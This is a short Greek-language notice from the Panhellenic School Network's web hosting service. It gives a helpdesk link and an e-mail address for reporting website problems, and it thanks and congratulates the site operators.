Για οποιαδήποτε απορία/διευκρίνηση καθώς και δυσλειτουργία της Ιστοσελίδας σας παρακαλούμε να μας ενημερώσετε είτε καταχωρώντας μια αναφορά προβλήματος/αιτήματος στο http://helpdesk.sch.gr είτε αποστέλλοντας e-mail στο webhost (at) sch.gr.

Σας ευχαριστούμε για τη συνεργασία σας. Θα θέλαμε επίσης να επισημάνουμε και εκφράσουμε τα συγχαρητήρια μας, για  την εξαιρετική δουλειά που γίνεται στις ιστοσελίδες σας και τις εφαρμογές που αναπτύσσετε και λειτουργείτε.

Mε εκτίμηση

ΠΑΝΕΛΛΗΝΙΟ ΣΧΟΛΙΚΟ ΔΙΚΤΥΟ
Υπηρεσία Φιλοξενίας ιστοσελίδων
URL:  http://www.sch.gr/webhosting